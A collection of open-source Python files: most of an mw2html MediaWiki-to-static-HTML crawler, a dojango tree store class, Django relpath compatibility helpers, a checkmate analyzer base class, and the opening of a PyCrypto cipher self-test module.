doc = remove_tag(doc, '<div class="portlet" id="p-personal">', '</div>', '<div')
doc = remove_tag(doc, '<div id="p-search" class="portlet">', '</div>', '<div')
doc = remove_tag(doc, '<div class="portlet" id="p-editors">', '</div>', '<div')
doc = remove_tag(doc, '<div id=\'catlinks\' class=\'catlinks catlinks-allhidden\'>', '</div>', '<div')
#James also remove the page/discussion/source/history/ div.
doc = remove_tag(doc, '<li id="ca-', '</li>', '<li')
#andre special mode
if config.special_mode:
# Remove ul list
doc = remove_tag(doc, '<ul id="f-list">', '</ul>', '<ul')
# Remove link rel alternate and edit
doc = re.sub(r'<link rel="alternate"[\s\S]+?/>', r'', doc)
doc = re.sub(r'<link rel="edit"[\s\S]+?/>', r'', doc)
# Remove print footer
doc = re.sub(r'<div class="printfooter">[\s\S]+?</div>', r'', doc)
# Remove noexport
doc = remove_tag(doc, '<div class="noexport"', '</div>', '<div')
doc = remove_tag(doc, '<span class="noexport"', '</span>', '<span')
# Remove editornote
doc = remove_tag(doc, '<div class="editornote"', '</div>', '<div')
else:
# Remove powered by MediaWiki logo
doc = re.sub(
r'<div id="f-poweredbyico">[\s\S]+?(<ul id="f-list">)',
r'\1', doc)
# Remove page has been accessed X times list item.
doc = re.sub(r'<li id="f-viewcount">[\s\S]+?</li>', r'', doc)
# Remove disclaimers list item.
doc = re.sub(r'<li id="f-disclaimer">[\s\S]+?</li>', r'', doc)
# Remove edit links
doc = remove_tag(doc, '<div class="editsection"', '</div>', '<div')
doc = remove_tag(doc, '<span class="editsection"', '</span>', '<span')
return doc
def pre_html_transform(doc, url):
"""
User-customizable HTML transform.
Given an HTML document (with URLs already rewritten), returns
modified HTML document.
"""
global config
if config.hack_skin:
if config.skin == MONOBOOK_SKIN:
doc = monobook_fix_html(doc, url)
if not config.special_mode:
doc = monobook_hack_skin_html(doc)
else:
raise ValueError('unknown skin')
if config.move_href:
doc = fix_move_href_tags(doc)
if config.remove_history:
doc = html_remove_image_history(doc)
doc = html_remove_translation_links(doc)
return doc
def pos_html_transform(doc, url):
global footer_text, config, sidebar_html
url = normalize_url(url, False)
# Add sidebar.html
if config.sidebar != None and sidebar_html == '':
f = open(config.sidebar, 'rU')
sidebar_html = f.read()
f.close()
doc = re.sub(r'(<!-- end of the left \(by default at least\) column -->)', sidebar_html + r'\1', doc)
# Remove empty links
doc = clean_tag(doc, 'href=""', '</a>', '<a ');
if config.special_mode:
# Remove external link rel stylesheet
doc = re.sub(r'<link rel="stylesheet" href="http://[\s\S]+?/>', r'', doc)
# Remove external javascript
doc = re.sub(r'<script type="text/javascript" src="http://[\s\S]+?</script>', r'', doc)
# Replace remaining text with footer, if available (this needs to be done after parse_html to avoid rewriting of urls
if config.footer is not None:
s1 = '<div id="footer">'
# match correct divs
(i1, i2) = find_tag_limits(doc, s1, '</div>', '<div')
if (i1 == -1):
return doc
if footer_text == '':
f = open(config.footer, 'rU')
footer_text = f.read()
f.close()
# add static dump time
footer_html = footer_text.replace('%DATE%', strftime("%Y-%m-%d"))
# add online url
footer_html = footer_html.replace('%ONLINEURL%', url)
if config.special_mode:
# keep MediaWiki credits
doc = doc[:i2] + footer_html + doc[i2:]
else:
doc = doc[:i1 + len(s1)] + footer_html + doc[i2:]
return doc
def fix_move_href_tags(doc):
"""
Return copy of doc with all MOVE_HREF tags removed.
"""
while '<' + MOVE_HREF in doc:
i1 = doc.index('<' + MOVE_HREF)
i2 = doc.index('</' + MOVE_HREF, i1 + 1)
i3 = doc.index('>', i2 + 1)
(start, end) = (i1, i3 + 1)
tags = htmldata.tagextract(doc[start:end])
assert tags[0][0] == MOVE_HREF
assert tags[-1][0] == '/' + MOVE_HREF
href = tags[0][1].get('href', '')
new_tags = []
for tag in tags[1:-1]:
if len(tag) == 2:
if 'href' in tag[1]:
if href == '':
continue
tag[1]['href'] = href
new_tags += [tag]
doc = doc[:start] + htmldata.tagjoin(new_tags) + doc[end:]
return doc
def html_remove_image_history(doc):
"""
Remove image history and links to information.
"""
doc = re.sub(r'<h2>Image history</h2>[\s\S]+?</ul>', r'', doc)
doc = re.sub(r'<h2>Image links</h2>[\s\S]+?</ul>', r'', doc)
return doc
def html_remove_translation_links(doc):
"""
Remove translation links (the international flags).
We identify them by the pattern for a 2 letter language code, /[\s\S][\s\S][/"]
in the URL.
"""
doc = re.sub(r'<a href="[^"]+/[\s\S][\s\S][/"][\s\S]+?</a>', r'<!--Removed Translation Flag-->', doc)
doc = re.sub(r'<a href="[^"]+/[\s\S][\s\S]_[\s\S][\s\S][/"][\s\S]+?</a>', r'<!--Removed Translation Flag2-->', doc)
return doc
def monobook_hack_skin_html(doc):
"""
Hacks Monobook HTML output: use CSS ids for hacked skin.
See monobook_hack_skin_css.
"""
doc = doc.replace('<div id="globalWrapper">', '<div id="globalWrapperHacked">')
doc = doc.replace('<div id="footer">', '<div id="footerHacked">')
doc = doc.replace('</body>', '<br></body>')
return doc
def monobook_hack_skin_css(doc, url):
"""
Hacks Mediawiki 1.4beta6 Monobook main CSS file for better looks.
Removes flower background. Defines *Hacked CSS ids, so we can add
an orange bar at the top, and clear the orange bar right above the
footer.
"""
global config
if not url.endswith('monobook/main.css'):
return doc
doc = "/* Monobook skin automatically modified by mw2html. */" + doc
doc = doc.replace('url("headbg.jpg")', '')
doc += """
/* Begin hacks by mw2html */
#globalWrapperHacked {
font-size:127%;
width: 100%;
background-color: White;
border-top: 1px solid #fabd23;
border-bottom: 1px solid #fabd23;
margin: 0.6em 0em 1em 0em;
padding: 0em 0em 1.2em 0em;
}
#footerHacked {
background-color: White;
margin: 0.6em 0em 0em 0em;
padding: 0.4em 0em 0em 0em;
text-align: center;
font-size: 90%;
}
#footerHacked li {
display: inline;
margin: 0 1.3em;
}
"""
c1 = '#column-one { padding-top: 160px; }'
c2 = '#column-one { padding-top: 3.0em; }'
assert c1 in doc
doc = doc.replace(c1, '/* edit by mw2html */\n' + c2 +
'\n/* end edit by mw2html */\n')
# Remove external link icons.
if config.remove_png:
doc = re.sub(r'#bodyContent a\[href \^="http://"\][\s\S]+?\}', r'', doc)
return doc
def post_css_transform(doc, url):
"""
User-customizable CSS transform.
Given a CSS document (with URLs already rewritten), returns
modified CSS document.
"""
global config
if config.hack_skin and not config.special_mode:
if config.skin == MONOBOOK_SKIN:
doc = monobook_hack_skin_css(doc, url)
else:
raise ValueError('unknown skin')
return doc
def move_to_index_if_needed(ans):
global config
if ans.endswith(config.index):
ans = ans[:len(ans) - len(config.index)] + INDEX_HTML
return ans
def file_exists_in_written_set(filename):
return os.path.normcase(os.path.normpath(filename)) in wrote_file_set
def find_unused_filename(filename, exists=os.path.exists):
"""
Return 'file' if 'file' doesn't exist, otherwise 'file1', 'file2', etc.
Existance is determined by the callable exists(), which takes
a filename and returns a boolean.
"""
if not exists(filename):
return filename
(head, tail) = os.path.split(filename)
i = 1
while True:
numbered = (os.path.splitext(tail)[0] + str(i) +
os.path.splitext(tail)[1])
fullname = os.path.join(head, numbered)
if not exists(fullname):
return fullname
i += 1
def clean_filename(url, ans):
# Split outdir and our file/dir under outdir
# (Note: ans may not be a valid filename)
global config
(par, ans) = (ans[:len(config.outdir)], ans[len(config.outdir):])
if ans.startswith(os.sep):
ans = ans[1:]
# Replace % escape codes with underscores, dashes with underscores.
while '%%' in ans:
ans = ans[:ans.index('%%')] + '_' + ans[ans.index('%%') + 2:]
while '%25' in ans:
ans = ans[:ans.index('%25')] + '_' + ans[ans.index('%25') + 5:]
while '%' in ans:
ans = ans[:ans.index('%')] + '_' + ans[ans.index('%') + 3:]
ans = ans.replace('-', '_')
while '__' in ans:
ans = ans.replace('__', '_')
while '_.' in ans:
ans = ans.replace('_.', '.')
# Rename math thumbnails
if '/math/' in url:
tail = os.path.split(ans)[1]
if os.path.splitext(tail)[1] == '.png':
tail = os.path.splitext(tail)[0]
if set(tail) <= set('0123456789abcdef') and len(tail) == 32:
ans = 'math_' + hashlib.md5(tail).hexdigest()[:4] + '.png'
return os.path.join(par, ans)
def flatten_filename(url, filename):
global config
def get_fullname(relname):
return os.path.join(config.outdir, relname)
orig_ext = os.path.splitext(filename)[1]
(head, tail) = os.path.split(filename)
if tail == INDEX_HTML:
(head, tail) = os.path.split(head)
ans = tail
if os.path.splitext(ans)[1] != orig_ext:
ans = os.path.splitext(ans)[0] + orig_ext
return os.path.join(config.outdir, ans)
def split_section(url):
"""
Splits into (head, tail), where head contains no '#' and is max length.
"""
if '#' in url:
i = url.index('#')
return (url[:i], url[i:])
else:
return (url, '')
def url_open(url):
# download a file and retrieve its content and mimetype
global conn, domain, counter, redir_cache, errors
l_redir = []
redirect = url
while redirect != '':
l_redir += [url]
L = urlparse.urlparse(url)
if L[1] != domain:
conn.close()
print "connection to", domain, "closed."
conn = httplib.HTTPConnection(L[1])
domain = L[1]
print "connection to", domain, "opened."
rel_url = url
pos = url.find(domain)
if pos != -1:
rel_url = url[pos + len(domain):]
attempts = 0
#number of attempts
total_attempts = 3
recovered = False
success = False
while not success and attempts < total_attempts:
#increment httplib requests counter
counter += 1
try:
conn.request("GET", rel_url)
r = conn.getresponse()
print 'Status', r.status, r.reason, 'accessing', rel_url
if r.status == 404:
print " it's not possible to recover this error."
errors += 1
return ('', '')
if r.status == 500:
print " eventually this error might be recovered. let's try again."
print ' reconnecting...'
conn = httplib.HTTPConnection(domain)
attempts += 1
continue
if r.status == 403:
print " that shouldn't happen, but let's try again anyway."
print ' reconnecting...'
conn = httplib.HTTPConnection(domain)
attempts += 1
continue
if attempts != 0:
recovered = True
if r.status != 200:
print " Status other than 200, 404, 500, 403. It is: ", r.status
success = True
except httplib.HTTPException, e:
print 'ERROR', e.__class__.__name__, 'while retrieving', url
conn.close
if e.__class__.__name__ in ['BadStatusLine', 'ImproperConnectionState', 'NotConnected', 'IncompleteRead', 'ResponseNotReady']:
print "eventually this error might be recovered. let's try again."
print 'reconnecting...'
conn = httplib.HTTPConnection(domain)
attempts += 1
else:
print "it's not possible to recover this error."
errors += 1
return ('', '')
if recovered:
print "error recovered"
if not success:
print "it was not possible to recover this error."
errors += 1
return ('', '')
redirect = r.getheader('Location', '').split(';')[0]
if redirect != "":
url = redirect
else:
doc = r.read()
for item in l_redir:
redir_cache[normalize_url(item)] = normalize_url(url)
mimetype = r.getheader('Content-Type', '').split(';')[0].lower()
return (doc, mimetype)
def url_to_filename(url):
"""
Translate a full url to a full filename (in local OS format) under outdir.
Transforms web url into local url and caches it.
Downloads the file to disk and works with it there instead of download the same file two times (Performance Improvement).
"""
global config
nurl = normalize_url(url)
if nurl in url_filename_cache:
return url_filename_cache[nurl]
#ParseResult(scheme='http', netloc='www.cwi.nl:80', path='/%7Eguido/Python.html', params='', query='', fragment='')
turl = re.sub(r'm/index.php\?title=', r'man/', nurl)
turl = re.sub(r'.css&[\S\s]+', r'.css', turl)
L = list(urlparse.urlparse(turl))
#this way the url will not create a folder outside of the maindomain
droot = get_domain(config.rooturl)
if (L[1] != droot):
L[1] = droot
L[2] = L[2].strip('/')
lpath = L[2].split('/')
if not '.' in lpath[-1]:
# url ends with a directory name. Store it under index.html.
# L[2] += '/' + INDEX_HTML
L[2]=L[2]
else:
# 'title=' parsing
if L[4].startswith('title=') and L[2].endswith('index.php'):
L[4] = L[4][len('title='):]
L[2] = L[2][:-len('index.php')]
if lpath[-1]=='man':
L[2] = INDEX_HTML
if lpath[-1].lower().startswith( 'quick_help'):
L[2] = QHELP_HTML
L[3] = ''
L[2] = L[2].strip('/')
#don't sanitize / for path
L[0] = ''
L[2] = urllib.quote_plus(L[2], '/')
L[3] = urllib.quote_plus(L[3])
L[4] = urllib.quote_plus(L[4])
L[5] = urllib.quote_plus(L[5])
# Local filename relative to outdir
# os.sep - O.S. directory separator
# (More transformations are made to this below...).
FL = []
for i in L:
if i != '':
FL += [i]
subfile = os.sep.join(FL)
(doc, mimetype) = url_open(url)
if doc == '' or mimetype == '':
url_filename_cache[nurl] = ''
return ''
# Fix up extension based on mime type.
# Maps mimetype to file extension
MIME_MAP = {
'image/jpeg': 'jpg', 'image/png': 'png', 'image/gif': 'gif',
'image/tiff': 'tiff', 'text/plain': 'txt', 'text/html': 'html',
'text/rtf': 'rtf', 'text/css': 'css', 'text/sgml': 'sgml',
'text/xml': 'xml', 'application/zip': 'zip'
}
if mimetype in MIME_MAP:
(root, ext) = os.path.splitext(subfile)
ext = '.' + MIME_MAP[mimetype]
subfile = root + ext
subfile = subfile.lower()
ans = os.path.join(config.outdir, subfile)
if config.flatten:
ans = flatten_filename(nurl, ans)
if config.clean:
ans = clean_filename(nurl, ans)
if config.index != None:
ans = move_to_index_if_needed(ans)
ans = find_unused_filename(ans, file_exists_in_written_set)
# Cache and return answer.
wrote_file_set.add(os.path.normcase(os.path.normpath(ans)))
url_filename_cache[nurl] = ans
mode = ['wb', 'w'][mimetype.startswith('text')]
# Make parent directory if it doesn't exist.
try:
os.makedirs(os.path.split(ans)[0])
except OSError, e:
if e.errno != errno.EEXIST:
raise
# Not really needed since we checked that the directory
# outdir didn't exist at the top of run(), but let's double check.
if os.path.exists(ans) and not config.overwrite:
out.write('File already exists: ' + str(ans)) #@UndefinedVariable
sys.exit(1)
f = open(ans, mode)
f.write(doc)
f.close()
return ans
def url_to_relative(url, cururl):
"""
Translate a full url to a filename (in URL format) relative to cururl.
Relative url from curul to url.
"""
cururl = split_section(cururl)[0]
(url, section) = split_section(url)
L1 = url_to_filename(url).replace(os.sep, '/').strip('/').split('/')
if L1 == '':
return ''
L2 = url_to_filename(cururl).replace(os.sep, '/').strip('/').split('/')
while L1 != [] and L2 != [] and L1[0] == L2[0]:
L1 = L1[1:]
L2 = L2[1:]
rel_url = urllib.quote('../' * (len(L2) - 1) + '/'.join(L1)) + section
if rel_url == '':
return '#'
else:
return rel_url
def parse_css(doc, url):
"""
Returns (modified_doc, new_urls), where new_urls are absolute URLs for
all links found in the CSS.
"""
global config
new_urls = []
L = htmldata.urlextract(doc, url, 'text/css')
for item in L:
# Store url locally.
u = item.url
if config.no_images and any(u.strip().lower().endswith(suffix) for suffix in ('.jpg', '.gif', '.png', '.ico')):
item.url = ''
continue
new_urls += [u]
item.url = url_to_relative(u, url)
newdoc = htmldata.urljoin(doc, L)
newdoc = post_css_transform(newdoc, url)
return (newdoc, new_urls)
def should_follow(url):
"""
Returns a boolean for whether url should be spidered
Given that 'url' was linked to from site, return whether
'url' should be spidered as well.
"""
global config
# we don't have search on the local version
if (url.endswith('#searchInput')):
return False
# False if different domains.
nurl = normalize_url(url)
droot = get_domain(config.rooturl)
dn = get_domain(nurl)
if droot != dn and not (dn.endswith(droot) or droot.endswith(dn)):
if config.debug:
print url, 'not in the same domain'
return False
# False if multiple query fields or parameters found
if (url.count('&') >= 1 or url.count(';') > 0) and not any(x in url for x in ('.css', 'gen=css')):
if config.debug:
print url, 'with multiple query fields'
return False
if any(x in url for x in ('Special:', 'Image:', 'Talk:', 'User:', 'Help:', 'User_talk:', 'MediaWiki_talk:', 'File:', 'action=edit', 'title=-')):
if config.debug:
print url, 'is a forbidden wiki page'
return False
if config.no_images and any(url.strip().lower().endswith(suffix) for suffix in ('.jpg', '.gif', '.png', '.ico')):
if config.debug:
print url, 'is a image and you are in no-images mode'
return False
if any(url.strip().lower().endswith(suffix) for suffix in ('.zip', '.7z')):
if config.debug:
print url, 'is a compressed file'
return False
# limit_parent support
ncurl = normalize_url(config.rooturl)
if config.limit_parent and not nurl.startswith(ncurl):
L = nurl.split('/')
if ('.' not in L[-1]):
if config.debug:
print url, 'is a file outside of scope with unknown extension'
return False
# JKC: we do allow css from 'strange' places.
if '.css' in L[-1]:
return True
forbidden_parents = ['.php', '.html', '.htm']
for fp in forbidden_parents:
if fp in L[-1]:
if config.debug:
print url, 'is a page outside of scope'
return False
return True
def parse_html(doc, url):
"""
Returns (modified_doc, new_urls), where new_urls are absolute URLs for
all links we want to spider in the HTML.
"""
global config
BEGIN_COMMENT_REPLACE = '<BEGINCOMMENT-' + str(random.random()) + '>'
END_COMMENT_REPLACE = '<ENDCOMMENT-' + str(random.random()) + '>'
new_urls = []
doc = pre_html_transform(doc, url)
# Temporarily "get rid" of comments so htmldata will find the URLs
# in the funky "<!--[if" HTML hackery for IE.
doc = doc.replace('<!--', BEGIN_COMMENT_REPLACE)
doc = doc.replace('-->', END_COMMENT_REPLACE)
L = htmldata.urlextract(doc, url, 'text/html')
# in this code we change each absolute url in L
# into a relative one.
# we also kick-off zillions of subthreads to collect
# more pages.
for item in L:
u = item.url
follow = should_follow(u)
if follow:
if config.debug:
print 'ACCEPTED - ', u
# Store url locally.
new_urls += [u]
item.url = url_to_relative(u, url)
else:
# James, let's keep everything by default (but not follow it).
# if not any( license in u for license in ('creativecommons.org', 'wxwidgets.org', 'gnu.org', 'mediawiki.org') ):
# item.url = ''
if config.debug:
print 'NOT INCLUDED - ', u
newdoc = htmldata.urljoin(doc, L)
newdoc = newdoc.replace(BEGIN_COMMENT_REPLACE, '<!--')
newdoc = newdoc.replace(END_COMMENT_REPLACE, '-->')
newdoc = pos_html_transform(newdoc, url)
return (newdoc, new_urls)
def run(out=sys.stdout):
"""
Code interface.
"""
global conn, domain, counter, redir_cache, config
if urlparse.urlparse(config.rooturl)[1].lower().endswith('wikipedia.org'):
out.write('Please do not use robots with the Wikipedia site.\n')
out.write('Instead, install the Wikipedia database locally and use mw2html on\n')
out.write('your local installation. See the Mediawiki site for more information.\n')
sys.exit(1)
# Number of files saved
n = 0
if not config.overwrite and os.path.exists(config.outdir):
out.write('Error: Directory exists: ' + str(config.outdir))
sys.exit(1)
domain = get_domain(config.rooturl)
conn = httplib.HTTPConnection(domain)
print 'connection established to:', domain
complete = set()
pending = set([config.rooturl])
start = True
while len(pending) > 0:
url = pending.pop()
nurl = normalize_url(url)
if nurl in redir_cache:
nurl = redir_cache[nurl]
if nurl in complete:
if config.debug:
print url, 'already processed'
continue
complete.add(nurl)
filename = url_to_filename(url)
#this is needed for the first path as it doesn't know if it is a redirect or not in the begining
#at this point all the content of redir_cache is relative to the start path
if start:
start = False
aux_url = ''
for redir in redir_cache.iterkeys():
aux_url = normalize_url(redir)
url_filename_cache[aux_url] = filename
if aux_url not in complete:
complete.add(aux_url)
if aux_url != '':
nurl = normalize_url(redir_cache[nurl])
if filename == '':
continue
if not os.path.exists(filename):
print "ERROR: ", url, '\n'
continue
f = open(filename, 'r')
doc = f.read()
f.close()
new_urls = []
if filename.endswith('.html'):
(doc, new_urls) = parse_html(doc, url)
elif filename.endswith('.css'):
(doc, new_urls) = parse_css(doc, url)
# Save document changes to disk
# The unmodified file already exists on disk.
update = False
text_ext = ('txt', 'html', 'rtf', 'css', 'sgml', 'xml')
for ext in text_ext:
if filename.endswith(ext):
update = True
break
if update:
f = open(filename, 'w')
f.write(doc)
f.close()
if config.debug:
out.write(url + '\n => ' + filename + '\n\n')
n += 1
# Enqueue URLs that we haven't yet spidered.
for u in new_urls:
if normalize_url(u) not in complete:
# Strip off any #section link.
if '#' in u:
u = u[:u.index('#')]
pending.add(u)
conn.close()
print "connection to", domain, "closed."
out.write(str(n) + ' files saved\n')
print counter, "httplib requests done"
print errors, "errors not recovered"
def usage():
"""
Print command line options.
"""
usage_str = """
mw2html url outdir [options]
MW2HTML Audacity version
Converts an entire Mediawiki site into static HTML.
WARNING: This is a recursive robot that ignores robots.txt. Use with care.
url - URL of mediawiki page to convert to static HTML.
outdir - Output directory.
-f, --force - Overwrite existing files in outdir.
-d, --debug - Debug mode.
-s, --special-mode - -f --no-flatten --limit-parent -l sidebar.html
-b footer.html, keeps MediaWiki icon and more
design changes.
--no-flatten - Do not flatten directory structure.
--no-clean - Do not clean up filenames (clean replaces
non-alphanumeric chars with _, renames math thumbs).
--no-hack-skin - Do not modify skin CSS and HTML for looks.
--no-made-by - Suppress "generated by" comment in HTML source.
--no-move-href - Disable <movehref> tag. [1]
--no-remove-png - Retain external link PNG icons.
--no-remove-history - Retain image history and links to information.
--no-images - Discard images
--limit-parent - Do not explore .php pages outside the url path
(outside css, images and other files aren't affected)
-l, --left=a.html - Paste HTML fragment file into left sidebar.
-t, --top=a.html - Paste HTML fragment file into top horiz bar.
-b, --bottom=a.html - Paste HTML fragment file into footer horiz bar.
-i, --index=filename - Move given filename in outdir to index.html.
Example Usage:
mw2html http://127.0.0.1/mywiki/ out -f -i main_page.html -l sidebar.html
Freezes wiki into 'out' directory, moves main_page.html => index.html,
assumes sidebar.html is defined in the current directory.
[1]. The <movehref> tag.
Wiki syntax: <html><movehref href="a"></html>...<html></movehref></html>.
When enabled, this tag will cause all href= attributes inside of it to be
set to the given location. This is useful for linking images.
In MediaWiki, for the <html> tag to work, one needs to enable $wgRawHtml
and $wgWhitelistEdit in LocalSettings.php. A <movehref> tag with no href
field will remove all links inside it.
"""
print textwrap.dedent(usage_str.strip('\n'))
sys.exit(1)
def main():
"""
Command line interface.
"""
global config
try:
(opts, args) = getopt.gnu_getopt(sys.argv[1:], 'fsdl:t:b:i:',
['force', 'no-flatten', 'no-clean',
'no-hack-skin', 'no-made-by', 'left=',
'top=', 'bottom=', 'index=', 'no-move-href',
'no-remove-png', 'no-remove-history', 'limit-parent',
'special-mode', 'debug', 'no-images'])
except getopt.GetoptError:
usage()
# Parse non-option arguments
try:
(rooturl, outdir) = args
except ValueError:
usage()
config = Config(rooturl=rooturl, outdir=outdir)
# Parse option arguments
for (opt, arg) in opts:
if opt in ['-f', '--force', '-s', '-special-mode']:
config.overwrite = True
if opt in ['--no-flatten', '-s', '-special-mode']:
config.flatten = False
if opt in ['--no-clean']:
config.clean = False
if opt in ['--no-hack-skin']:
config.hack_skin = False
if opt in ['--no-made-by']:
config.made_by = False
if opt in ['--no-move-href']:
config.move_href = False
if opt in ['--no-remove-png']:
config.remove_png = False
if opt in ['--no-remove-history']:
config.remove_history = False
if opt in ['--no-images']:
config.no_images = True
if opt in ['--limit-parent', '-s', '-special-mode']:
config.limit_parent = True
if opt in ['-s', '-special-mode']:
config.special_mode = True
config.sidebar = 'sidebar.html'
config.footer = 'footer.html'
if opt in ['-d', '--debug']:
config.debug = True
if opt in ['-l', '--left']:
config.sidebar = os.path.abspath(arg)
if opt in ['-t', '--top']:
raise NotImplementedError
config.header = os.path.abspath(arg)
if opt in ['-b', '--bottom']:
config.footer = os.path.abspath(arg)
if opt in ['-i', '--index']:
config.index = arg
# Run program
run()
if __name__ == '__main__':
main()
| gpl-2.0 |
rubendario25/dojango | dojango/data/modelstore/treestore.py | 12 | 1656 | from stores import Store
from fields import StoreField
from methods import BaseMethod
class ChildrenMethod(BaseMethod):
""" A method proxy that will resolve the children
of a model that has a tree structure.
"django-treebeard" and "django-mptt" both attach a get_children method
to the model.
"""
def get_value(self):
store = self.field.proxied_args['StoreArg']
obj = self.field.proxied_args['ObjectArg']
ret = []
# TODO: optimize using get_descendants()
if hasattr(obj, "get_children"):
ret = store.__class__(objects=obj.get_children(), is_nested=True).to_python()
return ret
class ChildrenField(StoreField):
""" A field that renders children items
If your model provides a get_children method you can use that field
to render all children recursively.
(see "django-treebeard", "django-mptt")
"""
def get_value(self):
self._get_value = ChildrenMethod(self.model_field_name)
self._get_value.field = self
return self._get_value()
class TreeStore(Store):
""" A store that already includes the children field with no additional
options. Just subclass that Store, add the to-be-rendered fields and
attach a django-treebeard (or django-mptt) model to its Meta class:
class MyStore(TreeStore):
username = StoreField()
first_name = StoreField()
class Meta:
objects = YourTreeModel.objects.filter(id=1) # using treebeard or mptt
label = 'username'
"""
children = ChildrenField() | bsd-3-clause |
purpleidea/macaronic-net | django/utils/unittest/compatibility.py | 575 | 2096 | import os
import sys
try:
from functools import wraps
except ImportError:
# only needed for Python 2.4
def wraps(_):
def _wraps(func):
return func
return _wraps
__unittest = True
def _relpath_nt(path, start=os.path.curdir):
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
start_list = os.path.abspath(start).split(os.path.sep)
path_list = os.path.abspath(path).split(os.path.sep)
if start_list[0].lower() != path_list[0].lower():
unc_path, rest = os.path.splitunc(path)
unc_start, rest = os.path.splitunc(start)
if bool(unc_path) ^ bool(unc_start):
raise ValueError("Cannot mix UNC and non-UNC paths (%s and %s)"
% (path, start))
else:
raise ValueError("path is on drive %s, start on drive %s"
% (path_list[0], start_list[0]))
# Work out how much of the filepath is shared by start and path.
for i in range(min(len(start_list), len(path_list))):
if start_list[i].lower() != path_list[i].lower():
break
else:
i += 1
rel_list = [os.path.pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return os.path.curdir
return os.path.join(*rel_list)
# default to posixpath definition
def _relpath_posix(path, start=os.path.curdir):
"""Return a relative version of a path"""
if not path:
raise ValueError("no path specified")
start_list = os.path.abspath(start).split(os.path.sep)
path_list = os.path.abspath(path).split(os.path.sep)
# Work out how much of the filepath is shared by start and path.
i = len(os.path.commonprefix([start_list, path_list]))
rel_list = [os.path.pardir] * (len(start_list)-i) + path_list[i:]
if not rel_list:
return os.path.curdir
return os.path.join(*rel_list)
if os.path is sys.modules.get('ntpath'):
relpath = _relpath_nt
else:
relpath = _relpath_posix
| agpl-3.0 |
programmdesign/checkmate | checkmate/lib/analysis/base.py | 1 | 2319 | # -*- coding: utf-8 -*-
"""
This file is part of checkmate, a meta code checker written in Python.
Copyright (C) 2015 Andreas Dewes, QuantifiedCode UG
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as
published by the Free Software Foundation, either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import unicode_literals
import abc
class BaseAnalyzer(object):
"""
This abstract base class defines an analyzer, which takes file content and produces
statistics as well as a list of issues. It is also responsible for diffing statistical
data and issues obtained for different file revisions or snapshots.
"""
def __init__(self,code_environment,params = None,ignore = None):
self.code_environment = code_environment
self.params = params
if ignore is not None:
self.ignore = {}
for code in ignore:
self.ignore[code] = True
@abc.abstractmethod
def analyze(self,file_revision):
"""
Analyze a file and return a tuple (stats,issues) containing statistics and issues.
This method should return a dictionary with one of the following entries:
* issues: A list of issues found in the file revision
* stats: Statistics about the file revision
* depends_on: A list of dependencies for the file revision
* provides: A list of things the file revision provides (e.g. a module),
to be used with the `depends_on` field.
"""
pass
def diff(self,results_a,results_b):
pass
def diff_summary(self,summary_a,summary_b):
pass
@abc.abstractmethod
def summarize(self,items):
"""
Aggregate a list of items containing statistical information generated by 'analyze'.
"""
pass
| agpl-3.0 |
szymex/xbmc-finnish-tv | plugin.video.yleareena/win32/Crypto/SelfTest/Cipher/common.py | 115 | 16599 | # -*- coding: utf-8 -*-
#
# SelfTest/Hash/common.py: Common code for Crypto.SelfTest.Hash
#
# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""Self-testing for PyCrypto hash modules"""
__revision__ = "$Id$"
import sys
import unittest
from binascii import a2b_hex, b2a_hex
from Crypto.Util.py3compat import *
# For compatibility with Python 2.1 and Python 2.2
if sys.hexversion < 0x02030000:
# Python 2.1 doesn't have a dict() function
# Python 2.2 dict() function raises TypeError if you do dict(MD5='blah')
def dict(**kwargs):
return kwargs.copy()
else:
dict = dict
class _NoDefault: pass # sentinel object
def _extract(d, k, default=_NoDefault):
"""Get an item from a dictionary, and remove it from the dictionary."""
try:
retval = d[k]
except KeyError:
if default is _NoDefault:
raise
return default
del d[k]
return retval
# Generic cipher test case
class CipherSelfTest(unittest.TestCase):
def __init__(self, module, params):
unittest.TestCase.__init__(self)
self.module = module
# Extract the parameters
params = params.copy()
self.description = _extract(params, 'description')
self.key = b(_extract(params, 'key'))
self.plaintext = b(_extract(params, 'plaintext'))
self.ciphertext = b(_extract(params, 'ciphertext'))
self.module_name = _extract(params, 'module_name', None)
mode = _extract(params, 'mode', None)
self.mode_name = str(mode)
if mode is not None:
# Block cipher
self.mode = getattr(self.module, "MODE_" + mode)
self.iv = _extract(params, 'iv', None)
if self.iv is not None: self.iv = b(self.iv)
# Only relevant for OPENPGP mode
self.encrypted_iv = _extract(params, 'encrypted_iv', None)
if self.encrypted_iv is not None:
self.encrypted_iv = b(self.encrypted_iv)
else:
# Stream cipher
self.mode = None
self.iv = None
self.extra_params = params
def shortDescription(self):
return self.description
def _new(self, do_decryption=0):
params = self.extra_params.copy()
# Handle CTR mode parameters. By default, we use Counter.new(self.module.block_size)
if hasattr(self.module, "MODE_CTR") and self.mode == self.module.MODE_CTR:
from Crypto.Util import Counter
ctr_class = _extract(params, 'ctr_class', Counter.new)
ctr_params = _extract(params, 'ctr_params', {}).copy()
if ctr_params.has_key('prefix'): ctr_params['prefix'] = a2b_hex(b(ctr_params['prefix']))
